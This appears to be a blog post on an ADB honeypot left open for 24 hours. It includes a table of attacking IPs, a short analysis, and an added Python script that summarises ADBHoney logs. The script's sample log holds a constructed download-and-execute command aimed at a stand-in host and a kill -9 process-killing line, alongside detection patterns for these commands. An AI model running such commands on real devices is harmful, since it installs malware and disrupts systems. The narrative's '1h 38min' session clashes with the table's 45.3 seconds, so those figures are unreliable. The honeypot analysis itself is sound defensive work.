I found something really interesting: an ADB honeypot. I installed it on one of my servers via Docker. Then I waited for 24h.

Findings

After 24h

After 24h I logged back into my server and looked at the log data of the honeypot. If you want to take a look:

adbhoney.log

I analysed the data and here are my findings.

Table of connections

ID  IP               Country  ASN       Connections  Tot Time (s)  Avg Time (s)  Max Time (s)
1   103.205.XXX.XXX  VN       AS149137  1            45.3          45.3          45.3
2   157.10.XXX.XXX   VN       AS150862  3            136.2         45.4          45.5
3   198.235.XXX.XXX  BE       AS396982  2            0             0             0
4   139.59.XXX.XXX   IN       AS14061   6            2732.2        455.4         748
5   45.200.XXX.XXX   NL       AS50580   5            5.1           1             1
6   154.213.XXX.XXX  DE       AS51396   3            136.1         45.4          45.6
7   154.213.XXX.XXX  DE       AS51396   5            228.2         45.6          46
8   35.203.XXX.XXX   GB       AS396982  1            182.5         182.5         182.5
9   104.167.XXX.XXX  US       AS399045  5            228.3         45.7          45.8
10  115.231.XXX.XXX  CN       AS58461   1            20.9          20.9          20.9
11  172.169.XXX.XXX  US       AS8075    1            160           160           160
12  167.94.XXX.XXX   DE       AS398705  4            12.7          3.2           9.1
13  212.64.XXX.XXX   TR       AS197450  1            45.9          45.9          45.9

Analysis

A total of 13 unique IPs contacted my honeypot. The first connection lasted 1h 38min and came from Vietnam. The attacker tried to download and run a script in the temp folder (/data/local/tmp/). I ran the script through VirusTotal and it says that the script is malware. Only 30 minutes later a new connection came from Vietnam. It also tried to download a script, but it also wanted to kill some processes based on CPU usage. The 3rd IP just connected and did nothing else, 2 times. The 4th IP came from India and connected 6 times but also never really did anything. The next IP came from the Netherlands and did not send anything. The next 2 IPs came from Germany and tried to download malware to my honeypot 3 times. The 8th IP came from the UK, just connected and did nothing.
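As an added example (not code from this post or from the ADBHoney project), here is a small Python script that rebuilds the connection table above from the honeypot's JSON-lines events and flags the two behaviours described in the analysis: a payload fetched into /data/local/tmp/ and executed, and process killing. The event names and fields (eventid, src_ip, session, duration, input) follow the shape ADBHoney writes but are assumptions here, and the log lines are constructed, not taken from the real 24h capture.

```python
"""Rebuild the per-source connection table from ADBHoney JSON events and
flag the behaviours seen in the capture.

Added example, not code from this post or the ADBHoney project. The
eventid values and the src_ip/session/duration/input fields are assumed
to match ADBHoney's JSON-lines log; the sample lines are constructed.
"""
import json
import re
from collections import defaultdict

# Constructed sample events (not from the author's adbhoney.log).
SAMPLE_LOG = """\
{"eventid": "adbhoney.session.connect", "src_ip": "103.205.0.1", "session": "s1"}
{"eventid": "adbhoney.command.input", "src_ip": "103.205.0.1", "session": "s1", "input": "cd /data/local/tmp/; wget http://example.invalid/a.sh; chmod 777 a.sh; sh a.sh"}
{"eventid": "adbhoney.session.closed", "src_ip": "103.205.0.1", "session": "s1", "duration": 45.3}
{"eventid": "adbhoney.session.connect", "src_ip": "157.10.0.2", "session": "s2"}
{"eventid": "adbhoney.command.input", "src_ip": "157.10.0.2", "session": "s2", "input": "top -n 1 | awk '$9 > 50 {print $1}' | xargs kill -9"}
{"eventid": "adbhoney.session.closed", "src_ip": "157.10.0.2", "session": "s2", "duration": 45.4}
{"eventid": "adbhoney.session.connect", "src_ip": "157.10.0.2", "session": "s3"}
{"eventid": "adbhoney.session.closed", "src_ip": "157.10.0.2", "session": "s3", "duration": 45.6}
{"eventid": "adbhoney.session.connect", "src_ip": "198.235.0.3", "session": "s4"}
{"eventid": "adbhoney.session.closed", "src_ip": "198.235.0.3", "session": "s4", "duration": 0.0}
{"eventid": "adbhoney.session.connect", "src_ip": "198.235.0.3", "session": "s5"}
"""

TMP_DIR = "/data/local/tmp/"                       # world-writable drop location on Android
FETCH_TOOL = re.compile(r"\b(wget|curl)\b")       # payload download
KILL_CMD = re.compile(r"\b(kill|pkill|killall)\b")  # clearing out competing processes


def parse_log(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify_command(cmd):
    """Tag a shell line with the behaviours the post observed."""
    tags = []
    if TMP_DIR in cmd and FETCH_TOOL.search(cmd):
        tags.append("drop-and-run")
    if KILL_CMD.search(cmd):
        tags.append("kill-procs")
    return tags


def connection_table(events):
    """Connections per source IP with total, average and maximum session
    duration in seconds. Connections are counted from connect events and
    durations taken from closed events, so a session still open when the
    log was pulled counts as a connection without adding a duration."""
    stats = defaultdict(lambda: {"connections": 0, "durations": []})
    for ev in events:
        src = ev["src_ip"]
        if ev["eventid"] == "adbhoney.session.connect":
            stats[src]["connections"] += 1
        elif ev["eventid"] == "adbhoney.session.closed":
            stats[src]["durations"].append(float(ev.get("duration", 0.0)))
    table = {}
    for src, s in stats.items():
        d = s["durations"]
        total = round(sum(d), 1)
        table[src] = {
            "connections": s["connections"],
            "total_s": total,
            "avg_s": round(total / len(d), 1) if d else 0.0,
            "max_s": max(d) if d else 0.0,
        }
    return table


def suspicious_sessions(events):
    """(src_ip, session) -> tags for every session that ran a flagged command."""
    hits = {}
    for ev in events:
        if ev["eventid"] != "adbhoney.command.input":
            continue
        tags = classify_command(ev.get("input", ""))
        if tags:
            hits.setdefault((ev["src_ip"], ev["session"]), []).extend(tags)
    return hits


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print(f"{'IP':<16}{'Conn':>5}{'Tot (s)':>9}{'Avg (s)':>9}{'Max (s)':>9}")
    for src, r in connection_table(events).items():
        print(f"{src:<16}{r['connections']:>5}{r['total_s']:>9}{r['avg_s']:>9}{r['max_s']:>9}")
    for (src, sess), tags in suspicious_sessions(events).items():
        print(f"{src} session {sess}: {', '.join(tags)}")
```

Run it against the real file with `parse_log(open("adbhoney.log").read())` instead of SAMPLE_LOG. The third sample source shows the edge case worth keeping in mind when reading the table: a connection that was still open when the log was copied adds to the connection count but not to the durations, so the average is over closed sessions only.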

Final

So we found out that a lot of attackers try to abuse ADB devices.